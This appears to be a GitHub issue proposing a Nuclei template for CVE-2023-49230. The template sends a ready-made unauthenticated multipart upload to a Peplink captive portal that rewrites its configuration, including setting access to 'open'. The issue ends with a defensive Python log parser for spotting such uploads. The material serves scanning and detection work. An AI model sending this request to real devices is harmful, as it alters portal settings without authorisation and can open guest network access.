CVE-2023-49230 #12195

Open
@Evil-twinz

Description

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: cve-2023-49230

info:
  name: Peplink Captive Portal Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    Unauthenticated upload to /guest/portal_admin_upload.cgi with effect visible at /guest/preview.cgi?portal_id=1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-49230
  tags: cve, peplink, upload, unauth

http:
  # Step 1: Upload configuration
  - raw:
      - |
        POST /guest/portal_admin_upload.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------370611892836891531633729116268

        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="option"

        edit_page
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="mode"

        submit
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="portal_id"

        1
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="data"

        {"status":"ok","config":{"login":{"access_mode":"open","message":"","tnc_content":"Terms and Conditions.","tnc_title":"Terms and Conditions","tnc_link":"terms","tnc_prompt":"I agree to #TNC_LINK#","back_login_button":"Back to Login","agree_button":"Injected","session_id1":" ","session_id2":" "},"common":{"hide_quota":"no","landing_url":"","logo_url":"logo.cgi?portal_id=1&type=preview","logo_url_def":"logo.cgi?default=1","uploaded_logo_size":0,"footer":"Powered by Peplink.","footer_default":"Powered by Peplink."},"success":{},"reach_quota":{},"quota":{"limit":{"data":0,"session_timeout":1800}}}}
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo_action"

        x
        -----------------------------370611892836891531633729116268
        Content-Disposition: form-data; name="logo"; filename=""
        Content-Type: application/octet-stream

        -----------------------------370611892836891531633729116268--

    matchers:
      - type: word
        part: body
        words:
          - '"status": "save_success"'
        

Relevant dumped responses

[cve-2023-49230:word-1] [http] [high] https://redact.com/guest/portal_admin_upload.cgi

Anything else?

https://www.tenable.com/cve/CVE-2023-49230
https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf
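
On the defensive side, the request this template sends can be looked for in web logs. The following is an added example, not part of the issue or of the nuclei-templates project; it assumes combined-log-format lines from a proxy in front of the portal, and the function names, the `admin_ips` allow-list and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoints named in the template description on this page.
UPLOAD_PATH = "/guest/portal_admin_upload.cgi"
PREVIEW_PATH = "/guest/preview.cgi"

# Assumption: combined-log-format lines from a proxy in front of the portal.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def split_target(target):
    """Return (normalised path, query) so encoded or doubled slashes still match."""
    path, _, query = target.partition("?")
    return re.sub(r"/{2,}", "/", unquote(path)), query

def find_portal_uploads(lines, admin_ips=frozenset()):
    """List POSTs to the upload endpoint from clients outside admin_ips.

    confirmed_preview becomes True when the same client later requests the
    preview page with a portal_id, the follow-up the description mentions.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path, query = split_target(m["target"])
        ip, method = m["ip"], m["method"]
        if method == "POST" and path == UPLOAD_PATH and ip not in admin_ips:
            findings.append({"ip": ip, "time": m["ts"],
                             "status": int(m["status"]), "confirmed_preview": False})
        elif method == "GET" and path == PREVIEW_PATH and "portal_id" in parse_qs(query):
            for f in findings:
                if f["ip"] == ip:
                    f["confirmed_preview"] = True
    return findings

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [12/Dec/2023:10:01:05 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 64 "-" "-"',
    '198.51.100.7 - - [12/Dec/2023:10:01:06 +0000] "GET /guest/preview.cgi?portal_id=1 HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.10 - - [12/Dec/2023:10:05:00 +0000] "POST /guest/portal_admin_upload.cgi HTTP/1.1" 200 64 "-" "-"',
    '203.0.113.5 - - [12/Dec/2023:10:09:41 +0000] "POST /guest//portal_admin_upload.cgi HTTP/1.1" 403 0 "-" "-"',
]
```

Calling `find_portal_uploads(SAMPLE_LOG, admin_ips={"192.0.2.10"})` returns two findings; access logs carry no response body, so the template's `save_success` marker cannot be checked this way.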

Metadata

Labels

  • Status: In Progress (This issue is being worked on, and has someone assigned.)
  • template-contribution (Nuclei template contribution)
